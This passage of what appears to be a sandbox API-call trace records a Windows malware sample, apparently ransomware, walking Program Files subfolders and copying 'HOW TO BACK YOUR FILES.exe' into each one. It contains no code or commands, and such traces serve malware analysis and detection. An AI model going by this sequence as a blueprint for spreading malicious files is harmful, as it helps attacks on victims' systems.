dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.903] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.903] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.903] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk" [0074.903] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335108 | out: hHeap=0x2b0000) returned 1 [0074.903] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0074.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned 73 [0074.903] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk" | out: lpString1="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk" [0074.903] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.903] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0074.904] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0074.904] GetLastError () returned 0x0 [0074.904] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.904] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.904] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.904] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.905] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Services") returned="C:\\Program Files\\Common Files\\Services" [0074.905] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed798 | out: hHeap=0x2b0000) returned 1 [0074.905] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0074.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services") returned 38 [0074.905] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Services" | out: lpString1="C:\\Program Files\\Common Files\\Services") returned="C:\\Program Files\\Common Files\\Services" [0074.905] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.905] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.911] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.911] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5e283e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e283e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.911] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.911] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.911] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared") returned="C:\\Program Files\\Common Files\\Microsoft Shared" [0074.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0074.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0074.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared") returned 46 [0074.911] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared") returned="C:\\Program Files\\Common Files\\Microsoft Shared" [0074.911] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.911] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.915] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.915] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5e283e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e283e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.915] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.915] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.916] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions" [0074.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfed8 | out: hHeap=0x2b0000) returned 1 [0074.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0074.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions") returned 68 [0074.916] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions" [0074.916] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.916] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.927] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.927] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5e2a9f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e2a9f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.927] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.927] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.927] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14" [0074.927] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfed8 | out: hHeap=0x2b0000) returned 1 [0074.927] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0074.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14") returned 71 [0074.927] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14" [0074.928] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.928] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.932] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.932] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5e2a9f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e2a9f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.932] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.932] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.932] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN" [0074.932] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335108 | out: hHeap=0x2b0000) returned 1 [0074.932] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0074.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN") returned 75 [0074.932] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN" [0074.932] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.932] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.938] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.938] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5e2a9f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e2a9f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.938] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.938] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.938] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033" [0074.938] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2be0 | out: hHeap=0x2b0000) returned 1 [0074.938] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0074.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033") returned 80 [0074.938] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033" [0074.938] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.938] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.942] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.942] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5e2d00c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e2d00c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.942] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.942] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.943] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders" [0074.943] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0074.943] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0074.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders") returned 58 [0074.943] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders" [0074.943] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.943] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.948] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.948] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5e2d00c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e2d00c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.948] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.948] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.948] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033" [0074.948] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0074.948] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0074.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033") returned 63 [0074.948] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033" [0074.948] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.948] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.952] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.952] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5e2d00c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e2d00c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.952] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.952] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.952] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO" [0074.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4a20 | out: hHeap=0x2b0000) returned 1 [0074.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0074.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO") returned 51 [0074.953] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO" [0074.953] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.953] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.961] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.961] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x5e2f6220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e2f6220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.962] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.962] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.962] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0" [0074.962] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0074.962] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0074.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0") returned 56 [0074.962] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0" [0074.962] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.962] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.971] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.971] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x5e2f6220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e2f6220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.972] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.972] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.972] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033" [0074.972] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0074.972] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0074.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033") returned 61 [0074.972] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033") 